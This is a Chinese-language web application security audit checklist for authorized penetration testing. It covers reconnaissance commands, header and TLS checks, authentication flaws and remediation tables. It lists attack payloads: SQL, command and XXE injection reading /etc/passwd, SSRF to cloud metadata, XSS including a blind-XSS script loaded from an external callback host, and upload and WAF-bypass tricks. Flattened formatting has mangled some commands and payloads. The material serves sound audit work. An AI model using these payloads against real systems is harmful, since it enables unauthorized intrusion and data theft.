一、审计准备与范围界定适用于渗透测试、安全评估及合规审计如等保、ISO 27001检查项具体内容授权确认获取书面授权书RoE明确测试时间、IP/域名范围、测试深度资产梳理主站、子域、API 端点、CDN、WAF、第三方组件、云存储桶基线建立记录正常业务流量特征避免测试影响生产环境工具准备Burp Suite / OWASP ZAP、Nmap、Nikto、SQLMap、XSStrike、Postman二、信息收集与暴露面分析2.1 被动信息收集不触碰目标# 子域名枚举subfinder-dexample.com-allamass enum-passive-dexample.com# 历史 URL / 参数收集waybackurls example.com|unfurl-ukeys# GitHub 泄露扫描githound --dig-files --dig-commits --repo-user example.com# 云存储桶探测# 检查 s3.amazonaws.com/example.com 等命名规律检查要点源码/配置文件/密钥是否在 GitHub/GitLab 泄露历史删除的敏感接口是否仍可通过 Wayback Machine 访问员工邮箱、内部系统域名是否在公开渠道暴露WHOIS 信息是否泄露管理员联系方式2.2 主动探测# 端口与服务扫描nmap-sS-sV-p---scripthttp-title,http-enum,ssl-enum-ciphers example.com# Web 目录爆破dirsearch-uhttps://example.com-ephp,asp,aspx,jsp,html,js,txt,bak# 技术栈识别whatweb https://example.com wappalyzer 浏览器插件检查要点非必要端口开放如 3306、6379、27017、8080、8443备份文件泄露.bak、.zip、.sql、.tar.gz敏感目录未授权访问/admin/、/api/、/.git/、/.env默认页面/安装向导未删除phpinfo、Django 调试页、IIS 欢迎页三、传输层与配置安全检查项验证方法风险等级HTTPS 强制跳转访问http://观察是否 301/307 到 HTTPS中HSTS 头curl -I https://example.com检查Strict-Transport-Security中TLS 版本与套件nmap --script ssl-enum-ciphers -p 443 example.com高证书有效性过期、自签名、通配符滥用、SAN 缺失中CSP 策略检查Content-Security-Policy是否存在及配置合理性中X-Frame-Options防止点击劫持DENY或SAMEORIGIN中X-Content-Type-Optionsnosniff防止 MIME 嗅探低Referrer-Policy控制 Referrer 泄露范围低Permissions-Policy限制浏览器敏感 API摄像头、地理位置低CORS 配置Access-Control-Allow-Origin: *是否过度宽松高Cookie 安全属性HttpOnly、Secure、SameSite是否齐全高四、认证与会话管理重点4.1 认证机制弱口令策略是否允许123456、password、与用户名相同暴力破解防护登录失败是否有验证码、IP 封禁、速率限制多因素认证 (MFA)是否支持且可绕过如响应包篡改、前端跳过密码找回逻辑是否可枚举用户、Token 可预测、链接未过期OAuth / SSO 安全回调地址是否校验、state 参数是否使用、scope 是否最小化JWT 安全算法是否为none、密钥是否弱、是否未验证签名4.2 会话管理Session ID 熵值是否可预测时间戳、自增 ID、MD5 简单哈希会话固定攻击登录后 Session ID 是否不变并发登录控制同一账号多地登录是否有提示/互踢注销有效性点击注销后旧 Session 是否立即失效服务端黑名单Cookie 作用域Path 和 Domain 是否设置过宽五、输入验证与注入漏洞核心漏洞类型测试 Payload 示例验证工具SQL 注入id1 AND 11--/id1 UNION SELECT null,null--SQLMap, Burp ScannerNoSQL 注入username[$ne]adminpassword[$ne]1手工构造命令注入; cat /etc/passwd/$(whoami)手工 Burp RepeaterLDAP 注入*)(uid*))((uid*手工XPath 注入]//password%00XML 外部实体 (XXE)!DOCTYPE foo [!ENTITY xxe SYSTEM file:///etc/passwd]Burp, XXEinjector反序列化漏洞Java ysoserial / PHP phar / Python pickleBurp, 专用工具SSRFurlhttp://169.254.169.254/latest/meta-data//urlfile:///etc/passwdBurp Collaborator模板注入 (SSTI){{7*7}}/${7*7}/% 7*7 %Tplmap深度检查项所有输入点是否均经过服务端校验URL 参数、Header、Body、Cookie、文件名WAF 绕过大小写混合、编码绕过、注释干扰、分块传输二次注入数据存入数据库后在其他功能点取出时未转义宽字节注入GBK 编码下%df绕过转义堆叠查询数据库是否支持多语句执行; DROP TABLE六、业务逻辑漏洞难以自动化发现场景攻击手法检查方法水平越权修改 ID 参数访问他人数据/order?id1001→id1002遍历 ID垂直越权普通用户伪造roleadmin或访问/admin/api修改 Cookie/Token/参数支付逻辑篡改金额、数量、折扣码、负数购买、并发请求重复支付拦截支付请求重放验证码绕过前端校验、不刷新可复用、验证码未绑定会话重放、删除参数密码重置劫持篡改响应包使success:false→true前端调试 拦截注册覆盖注册已存在账号时是否可覆盖密码重复注册测试批量操作缺少防重放机制导致优惠券重复领取Intruder 批量发包条件竞争并发提现/转账导致余额负数Turbo Intruder 高并发测试七、文件操作与上传安全上传功能是否校验 MIME 类型、文件头、后缀白名单黑名单绕过php5、phtml、htaccess、双写后缀、%00 截断解析漏洞Apache/Nginx/IIS 配置错误导致图片马解析为脚本路径遍历../../../etc/passwd读取任意文件文件包含 (LFI/RFI)?page../../../../etc/passwd、php://filter 伪协议Zip Slip上传恶意 ZIP 文件覆盖系统文件SVG XSS上传 SVG 文件内嵌script触发存储型 XSS八、客户端安全XSS / CSRF8.1 XSS 全类型检测类型检测场景示例 Payload反射型 XSSURL 参数直接回显scriptalert(document.domain)/script存储型 XSS留言板、昵称、头像、文件上传img srcx onerroralert(1)DOM 型 XSS前端 JS 处理 URL Hash/参数#img srcx onerroralert(1)Blind XSS管理员后台查看触发script srchttps://xss.report/c/你的ID/script绕过技巧检查过滤了script→ 用img onerror、svg onload、iframe srcdoc过滤了alert→ 用prompt、confirm、console.log、document.location编码绕过HTML 实体、Unicode、URL 编码、JS 八进制/十六进制CSP 绕过寻找白名单域内可上传/可控的 JS 文件8.2 CSRF 防护敏感操作转账、改密、删号是否缺少 Token 验证Token 是否可预测、是否未校验、是否仅校验存在性SameSite Cookie 是否为Strict或Lax双重 Cookie 提交防御是否实现九、API 安全专项认证方式API Key 是否硬编码在前端、Bearer Token 是否过期速率限制高频请求是否触发 429否则存在爆破/撞库风险批量赋值 (Mass Assignment)提交额外字段如is_admin: trueGraphQL 安全内省查询暴露 Schema、深度递归查询导致 DoSREST 越权/api/v1/users/123横向遍历、DELETE / PUT 方法未授权响应包敏感信息是否返回密码哈希、内网 IP、数据库连接串API 版本控制旧版本 API/v1/未废弃且存在已知漏洞十、报告输出与修复建议模板严重Critical漏洞影响修复建议SQL 注入数据库完全失控参数化查询Prepared StatementsORM 框架任意文件上传 RCE服务器沦陷白名单后缀、文件内容校验、上传目录无执行权限垂直越权非授权管理员操作服务端基于 Session 的权限校验禁止前端传角色高危High漏洞影响修复建议存储型 XSS窃取管理员 Cookie、钓鱼输出编码HTML Entity、CSP、HttpOnly CookieSSRF内网渗透、云元数据窃取白名单 URL、禁用非必要协议、内网 IP 黑名单敏感信息泄露源码、密钥、数据库凭证删除备份文件、.git 目录禁止访问、密钥分离存储中危Medium漏洞修复建议点击劫持X-Frame-Options: DENY CSPframe-ancestors不安全的 CORS严格校验 Origin禁止*通配弱口令/无 MFA强制密码复杂度策略启用多因素认证十一、推荐自动化扫描组合# 1. 资产发现subfinder-dexample.com|httpx-title-tech-detect -status-code# 2. 漏洞初筛nuclei-lurls.txt-t~/nuclei-templates/# 3. 深度 Crawl XSS/SQLikatana-uhttps://example.com-d5-ourls.txt dalfoxfileurls.txt --mining-dict --deep-dom# 4. API 安全arjun-uhttps://api.example.com/endpoint# 参数发现postman / burp 手动测试业务逻辑# 5. 综合报告nmap--scriptvuln nuclei 手工验证 → 汇总至 Markdown/PDF合规提示所有测试必须在授权范围内进行。建议遵循OWASP Testing Guide v4.2及PTES渗透测试执行标准方法论保留完整测试日志以备审计追溯。